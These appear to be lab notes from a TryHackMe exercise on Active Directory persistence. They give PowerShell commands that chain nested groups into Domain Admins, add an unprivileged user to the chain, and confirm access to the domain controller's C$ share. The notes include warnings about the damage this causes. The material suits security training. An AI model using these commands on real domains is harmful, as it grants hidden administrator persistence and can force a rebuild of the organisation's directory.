Persistence through group membership
A quick note here. These techniques are incredibly invasive and hard to remove. Even if you have sign-off on your red team exercise to perform these techniques, you must take the utmost caution when performing these techniques. In real-world scenarios, the exploitation of most of these techniques would result in a full domain rebuild. Make sure you fully understand the consequences of using these techniques and only perform them if you have prior approval on your assessment, and they are deemed necessary. In most cases, a red team exercise would be dechained at this point instead of using these techniques. Meaning you would most likely not perform these persistence techniques but rather simulate them.
The most privileged groups or resources are not always the best choice, as they are often more closely watched for changes by the blue team. Exploiting permission delegation gave privileges to reset user passwords, which would be good for maintaining access to workstations.
A local administrator group may be less monitored than a global administrator groups, and a group nested in a privileged group may be the access needed.
powershell -ep bypass
Create group in the People\IT OU:
New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 1" -SamAccountName "THM_nestgroup1" -DisplayName "THM Nest Group 1" -GroupScope Global -GroupCategory Security
Create group in the People\Sales OU:
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 2" -SamAccountName "THM_nestgroup2" -DisplayName "THM Nest Group 2" -GroupScope Global -GroupCategory Security
Create group in the People\Consulting OU:
New-ADGroup -Path "OU=CONSULTING,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 3" -SamAccountName "THM_nestgroup3" -DisplayName "THM Nest Group 3" -GroupScope Global -GroupCategory Security
Create group in the People\Marketing OU:
New-ADGroup -Path "OU=MARKETING,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 4" -SamAccountName "THM_nestgroup4" -DisplayName "THM Nest Group 4" -GroupScope Global -GroupCategory Security
Create group in the People\IT OU:
New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 5" -SamAccountName "THM_nestgroup5" -DisplayName "THM Nest Group 5" -GroupScope Global -GroupCategory Security
Add Group 1 to Group 2
Add-ADGroupMember -Identity 'THM_nestgroup2' -Members 'THM_nestgroup1'
Add Group 2 to Group 3
Add-ADGroupMember -Identity 'THM_nestgroup3' -Members 'THM_nestgroup2'
Add Group 3 to Group 4
Add-ADGroupMember -Identity 'THM_nestgroup4' -Members 'THM_nestgroup3'
Add Group 4 to Group 5
Add-ADGroupMember -Identity 'THM_nestgroup5' -Members 'THM_nestgroup4'
Add Group 5 to Domain Admins
Add-ADGroupMember -Identity 'Domain Admins' -Members 'THM_nestgroup5'
Add unprivileged user to Group 1
Add-ADGroupMember -Identity 'THM_nestgroup1' -Members 'user.name'
Verify inherited privileges
thmwrk1 as the unprivileged user.
Try accessing a privileged resource on the domain controller:
dir \\thmdc.za.tryhackme.loc\c$\Users Volume in drive \\thmdc.za.tryhackme.loc\c$ is Windows Volume Serial Number is 1634-22A9 Directory of \\thmdc.za.tryhackme.loc\c$ 01/04/2022 08:47 AM 103 delete-vagrant-user.ps1 05/01/2022 09:11 AM 169 dns_entries.csv 09/15/2018 08:19 AM <DIR> PerfLogs 05/11/2022 10:32 AM <DIR> Program Files 03/21/2020 09:28 PM <DIR> Program Files (x86) 05/01/2022 09:17 AM 1,725 thm-network-setup-dc.ps1 04/25/2022 07:13 PM <DIR> tmp 05/15/2022 09:16 PM <DIR> Tools 04/27/2022 08:22 AM <DIR> Users 04/25/2022 07:11 PM <SYMLINKD> vagrant [\\vboxsvr\vagrant] 04/27/2022 08:12 PM <DIR> Windows 3 File(s) 1,997 bytes 8 Dir(s) 51,573,755,904 bytes free
If this was a real organisation, we would not be creating new groups to nest. Instead, we would make use of the existing groups to perform nesting. This is something you would never do on a normal red team assessment and almost always dechain at this point since it breaks the organisation’s AD structure, and if we sufficiently break it, they would not be able to recover. At this point, even if the blue team was able to kick us out, the organisation would more than likely still have to rebuild their entire AD structure from scratch, resulting in significant damages.